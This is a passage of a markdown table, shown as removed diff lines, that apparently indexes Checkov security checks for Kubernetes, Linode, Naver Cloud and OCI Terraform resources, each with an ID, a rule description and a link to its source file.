-| 3428 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3429 | CKV_K8S_147 | resource | PodTemplate | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3430 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3431 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3432 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3433 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3434 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3435 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3436 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3437 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3438 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3439 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3440 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3441 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3442 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) |
-| 3443 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3444 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3445 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3446 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3447 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3448 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3449 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3450 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3451 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3452 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) |
-| 3453 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3454 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3455 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3456 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | 
Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3457 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3458 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3459 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3460 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3461 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3462 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3463 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets 
which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) | -| 3464 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) | -| 3465 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) | -| 3466 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) | -| 3467 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) | -| 3468 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | -| 3469 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | 
[RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | -| 3470 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | -| 3471 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | -| 3472 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3473 | CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3474 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3475 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3476 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` 
sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3477 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3478 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3479 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3480 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3481 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3482 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for 
groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3483 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3484 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3485 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3486 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3487 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. 
| Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3488 | CKV2_K8S_5 | resource | ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3489 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3490 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3491 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3492 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | -| 3493 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | -| 3494 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | 
[credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | -| 3495 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | -| 3496 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | -| 3497 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | -| 3498 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | -| 3499 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | -| 3500 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | -| 3501 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 3502 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure 
every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 3503 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | -| 3504 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | -| 3505 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | -| 3506 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | -| 3507 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. 
| Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | -| 3508 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | -| 3509 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | -| 3510 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | -| 3511 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | -| 3512 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. 
| Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | -| 3513 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | -| 3514 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | -| 3515 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | -| 3516 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | -| 3517 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 3518 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 3519 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | -| 3520 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | -| 3521 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | -| 3522 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 3523 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 3524 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | -| 3525 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | -| 3526 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | -| 3527 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | -| 3528 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | -| 3529 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | -| 3530 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | -| 3531 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
